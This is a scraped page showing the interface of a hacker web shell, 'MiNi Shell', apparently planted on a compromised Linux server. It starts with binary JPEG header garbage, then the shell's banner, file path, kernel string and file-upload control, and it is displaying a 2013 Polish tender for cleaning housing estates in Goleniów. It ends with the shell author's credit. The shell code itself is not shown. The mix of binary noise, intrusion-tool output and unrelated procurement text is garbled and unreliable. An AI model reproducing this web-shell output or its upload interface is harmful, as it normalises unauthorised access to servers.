JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130729/151929-N-2013.html

<p class="kh_header"><b>Goleniów: Sprzątanie i utrzymanie w czystości wnętrz budynków oraz terenów zewnętrznych budynków stanowiących własność Goleniowskiego Towarzystwa Budownictwa Społecznego Spółka z o.o. w Goleniowie położonych przy ulicy Szarych Szeregów nr  3, 11, 13, 15 i 17</b><br>
<b>Numer ogłoszenia: 151929 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Goleniowskie Towarzystwo Budownictwa Społecznego Sp. z o.o. , ul. Wincentego Witosa 7/12, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4182851, faks 091 4185218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.goleniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: art.3 ust.1 pkt. 5a Pzp..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie i utrzymanie w czystości wnętrz budynków oraz terenów zewnętrznych budynków stanowiących własność Goleniowskiego Towarzystwa Budownictwa Społecznego Spółka z o.o. w Goleniowie położonych przy ulicy Szarych Szeregów nr  3, 11, 13, 15 i 17.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.3.1	Przedmiotem zamówienia jest:
1. Sprzątanie codzienne we wszystkie dni robocze i soboty  (z wyłączeniem niedziel i dni świątecznych) pomieszczeń przeznaczonych do ogólnego użytku jak : klatki schodowe, korytarze piwniczne,  strychy n/w budynków:
- budynek nr 3 przy ul. Szarych Szeregów składa się z: 3 klatki - 4 kondygnacyjne, 12 szt. okien, drzwi: zew. 3 szt, i wew, szt. 3, 	okna piwniczne 6 szt. po 2 w kl. 
- budynek nr 11 przy ul. Szarych Szeregów składa się z: 3 klatki - 4 kondygnacyjne,12 szt. okien,  drzwi: zew. 3 szt, i wew, szt. 3, okna piwniczne 6 szt. po 2 w kl. 
- budynek nr 13 przy ul. Szarych Szeregów składa się z: 3 klatki - 4 kondygnacyjne, 12 szt. okien, drzwi: zew. 3 szt, i wew, szt. 3, 	okna piwniczne 6 szt. po 2 w kl. 
- budynek nr 15 przy ul. Szarych Szeregów składa się z: 
3 klatki - 4 kondygnacyjne, 12 szt. okien,  drzwi: zew 3 szt. i wew, szt. 3,		okna piwniczne 6 szt. po 2 w kl. 
- budynek nr 17 przy ul. Szarych Szeregów składa się z:3 klatki - 4 kondygnacyjne, 12 szt. okien, drzwi: zew. 3 szt, i wew, szt. 3, 	okna piwniczne 6 szt. po 2 w kl. 	
Podłogi na klatkach schodowych - terakota, lamperie - tynk kamyczkowy

	Zakres sprzątania w tych pomieszczeniach w zależności od ich przeznaczenia i 	wyposażenia obejmuje:
-	usuwanie: zamiatanie, zbieranie odpadów i innych nieczystości z klatek  schodowych - codziennie,
-	usuwanie pajęczyn ze ścian, sufitów  klatek schodowych - na bieżąco,
-	mycie wewnętrznych parapetów, poręczy ( balustrad), włączników na 	klatkach schodowych  - raz w tygodniu,
-	mycie podłóg klatek schodowych - nie rzadziej niż dwa razy w miesięcy lub  w miarę potrzeb zgłaszanych przez Zamawiającego 	wynikających z warunków atmosferycznych,
-	czyszczenie lamperii - w miarę potrzeb nie rzadziej niż 1 x na pół roku,
-	mycie okien na klatkach schodowych nie rzadziej niż dwa razy w roku w 	terminach ustalonych przez zamawiającego ( nadzorujących),
-	mycie zewnętrznych i wewnętrznych  oszklonych drzwi wejściowych do 	klatek schodowych - według potrzeb,
-	usuwanie : zamiatanie, zbieranie odpadów i innych nieczystości z korytarzy 	piwnicznych - raz w tygodniu,
-	mycie podłóg korytarzy piwnicznych -  raz na pół roku,
-	mycie okien piwnicznych  - dwa razy w roku,
-	usuwanie pajęczyn ze ścian, sufitów w pomieszczeniach piwnicznych, 
-	mycie drzwi wejściowych prowadzących do piwnic - raz w tygodniu lub w 	razie  wystąpienia takiej konieczności.
W uzasadnionych przypadkach Zamawiający zastrzega sobie prawo zmiany 	częstotliwości  sprzątania pomieszczeń
2. Sprzątanie we wszystkie dni robocze włącznie z sobotami niezabudowanej 	części nieruchomości tj. podwórza, chodników i przyległych do budynków 	schodów, parkingów oraz dróg dojazdowych osiedlowych. 
Teren zewnętrzny przedstawia mapa stanowiąca załącznik nr 5 do niniejszej 	SIWZ
Chodniki i droga osiedlowa, parkingi drogi dojazdowe  - polbruk
Zakres sprzątania obejmuje:
-	zamiatanie i usuwanie odpadów i innych nieczystości z chodników, przyległych do budynków schodów, dróg dojazdowych wraz z usunięciem śmieci do kontenera - raz dziennie do godz. 14.00 	oprócz niedzieli i świąt,
-	usuwanie odpadów i innych nieczystości z placu zabaw - raz dziennie,
-	oczyszczanie ze śniegu, lodu i błota, usuwanie gołoledzi z ciągów 	komunikacyjnych nieruchomości  oraz z chodników położonych wzdłuż 	nieruchomości i schodów przyległych do nieruchomości - codziennie we 	wszystkie dni tygodnia ( również niedziele i święta) do godz. 7.00 rano  w 	przypadku powtórnych  opadów śniegu czynność należy wykonać jeszcze 	co najmniej 2 razy w ciągu dnia. Posypywanie piaskiem w razie wystąpienia 	takiej konieczności,
-	usuwanie śniegu i oblodzeń z wew. dróg dojazdowych i parkingów (bez 	wywozu śniegu i lodu) niezwłocznie w razie  wystąpienia takiej konieczności 	i posypywanie piaskiem w razie wystąpienia takiej konieczności,
-	pielęgnowanie zieleńców, grabienie i usuwanie liści na terenie 	nieruchomości nie rzadziej niż 2 razy w tygodniu.
Bezzwłoczne zawiadomienie Zamawiającego i właściwych służb technicznych o 	dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń 	technicznych oraz podejmowanie doraźnych środków niezbędnych do ochrony 	mieszkańców przed niebezpiecznymi dla życia i mienia mieszkańców Skutkami.
Dbałość  o należyty stan sprzętu przeciwpożarowego i narzędzi pomocniczych 	przeznaczonych do utrzymania porządku i czystości oraz zbiorników do 	gromadzenia odpadów i zawiadomienie Zamawiającego o konieczności ich 	wymiany.
Zawiadomienie Zamawiającego o rażących i uporczywych wypadkach  
naruszania 	przez mieszkańców regulaminu porządku domowego.
Bezzwłoczne zawiadomienie Zamawiającego o stwierdzonych faktach nie 	wywożenia nieczystości z pojemników - kontenerów.
Usuwanie z budynków  ogłoszeń, plakatów, afiszy, napisów, i rysunków 	umieszczonych bez zgody Zamawiającego oraz usuwanie            zdezaktualizowanych 	ogłoszeń umieszczonych przez Zamawiającego na
budynkach nie później niż dwa 	dni po upływie terminu.
Doręczanie korespondencji wychodzącej od Zamawiającego dla mieszkańców 	obsługiwanych nieruchomości oraz zgłoszenie się w siedzibie Zamawiającego 
po odbiór korespondencji na każdorazowe wezwanie.
Przez odśnieżanie rozumie się wykonanie czynności związanych z usunięciem  	śniegu i lodu - w sposób i terminie umożliwiającym bezpieczne korzystanie z 	terenu zamawiającego przez pieszych i pojazdy.

	Wykonawca dokonuje ww. czynności przy użyciu własnego sprzętu oraz zakupuje 	na własny koszt środki czystości, konserwacji i dezynfekujące.
 
	W okresie zimowym wykonawca zapewnia we własnym zakresie środki (oprócz 	piasku) umożliwiające utrzymanie ciągów komunikacyjnych w stanie 	zapewniającym bezpieczeństwo poruszania się pieszych i pojazdów.
	Zastosowane środki (rodzaj oraz sposób użycia) nie mogą naruszać 	obowiązujących norm.

	Potrzebę wykonania konkretnej czynności zgłasza wykonawcy kierownik 	Zamawiającego lub działający z jego upoważnienia pracownik :
	- Kierownik Działu Administracyjnego -  Anna Grycz
	- Mariola Zaczkiewicz 
Oferent na swoją odpowiedzialność i ryzyko winien obejrzeć miejsce świadczenia 	usług i zebrać wszelkie informacje, które mogą być niezbędne do przygotowania 	oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.91.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferenci muszą wykazać, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 oraz że spełniają warunki udziału w postępowaniu na podstawie art. 22 ust. 1ustawy Prawo zamówień publicznych, poprzez przedłożenie wymaganych w SIWZ dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferenci muszą udokumentować, że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, jednak sumaryczna wartość wykazanych usług nie może być mniejsza niż 1.500,00 zł miesięcznie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu na
podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
           Zamawiający dokona oceny spełnienia tego warunku udziału w postępowaniu na
           podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 50 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz Oferta, stanowiący załącznik nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Goleniowskie Towarzystwo Budownictwa Społecznego Spółka z o.o. ul. W. Witosa 7 w Goleniowie, pokój nr 13..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 10:00, miejsce: Goleniowskie Towarzystwo Budownictwa Społecznego Spółka z o.o. ul. W. Witosa 7 
72-100 Gioleniow, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com